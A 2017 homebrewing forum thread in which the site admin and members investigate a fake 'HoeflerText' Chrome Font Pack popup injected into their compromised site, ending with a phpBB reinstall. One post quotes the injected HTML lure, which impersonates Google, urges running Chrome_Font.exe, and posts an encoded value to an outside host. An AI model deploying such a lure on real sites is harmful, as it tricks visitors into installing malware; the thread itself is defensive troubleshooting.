Home of the BrewNosers

Posted: **Tue Mar 14, 2017 10:23 am**

Hey everyone,

A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.

If you see any page asking you to install a missing font, DO NOT DO IT.

If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.

If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.

Thanks,
-Rob

Posted: **Tue Mar 14, 2017 10:27 am**

Lots of it going around.

Thanks Rob.

S

Posted: **Tue Mar 14, 2017 10:37 am**

yeah its a fake font install...only an issue for chrome users

Posted: **Tue Mar 14, 2017 10:45 am**

I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.

Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.

Posted: **Tue Mar 14, 2017 11:15 am**

I had it on my home PC.

I resolved it but going to settings/advanced settings/reset settings.

it went away

https://malwaretips.com/blogs/remove-ch ... exe-virus/

bottom of the page...malware software didn't pick up on anything...maybe because i didn't click install on the virus popup

Posted: **Tue Mar 14, 2017 12:34 pm**

Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:

Posted: **Tue Mar 14, 2017 12:47 pm**

While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.

Posted: **Tue Mar 14, 2017 1:15 pm**

RubberToe wrote:While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.

Can no longer get it to pop up.

Posted: **Tue Mar 14, 2017 1:23 pm**

Odd. If you can get it to happen again please update.

Posted: **Tue Mar 14, 2017 1:55 pm**

Wordpress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through it's files there was something fishy as well. Wordpress has been a common attack vector for a long time, we don't maintain ours. Therefore I figure it's a liability so I removed it.

If anyone wants to replace the main web page I'm open to suggestions.

If anyone can reproduce this Chrome font thing I would like to know.

Thanks,
-Rob

Posted: **Tue Mar 14, 2017 3:10 pm**

Hey Rob,

I can reproduce by doing a google search for "site:brewnosers.org brewing" Any forum link i click will cause the font thing to open. If i view source it does have Hoefler in the text

Code: Select all

<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>

Im using Windows 10 and chrome Version 56.0.2924.87

Posted: **Tue Mar 14, 2017 3:14 pm**

Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome i had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snipped i posted.

Posted: **Tue Mar 14, 2017 3:20 pm**

Thanks for the info, Mark!

Posted: **Thu Mar 16, 2017 4:37 pm**

I used chrome to access the site for the first time today, had been using firefox. Got the virus warning. Tried to view source but the popup no longer appears.

Posted: **Thu Mar 16, 2017 11:48 pm**

Hi I am using a different computer and visited the site using chrome and got the virus. I saved the source for the whole page if its any use to you. Let me know if you want me to upload the txt file as an attachment or email it?
I got there by typing brewnosers in search and it was the first.
The google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw" onclick="window.open(this.href);return false;

I believe its cached so it may be a problem you no longer have. Don't know if you can request google to refetch the page due to this issue

Posted: **Sat Mar 18, 2017 1:21 pm**

Thanks.

Posted: **Thu Mar 23, 2017 4:34 pm**

It just happened to me again.

This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/" onclick="window.open(this.href);return false;

Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it:S http://forum.odroid.com/viewtopic.php?t=25568" onclick="window.open(this.href);return false;

After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.

Here are a few pictures of it happening

Posted: **Thu Mar 23, 2017 6:39 pm**

Thanks, I'm digging again.

Posted: **Thu Mar 23, 2017 6:43 pm**

Screw this, I'm installing a fresh copy of PHPBB. Here goes... don't worry, I have lots of backups.

Posted: **Thu Mar 23, 2017 7:45 pm**

The site has been upgraded. Now I have to fix the style. And new tapatalk!

Home of the BrewNosers

Attack / Virus

Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus

Re: Attack / Virus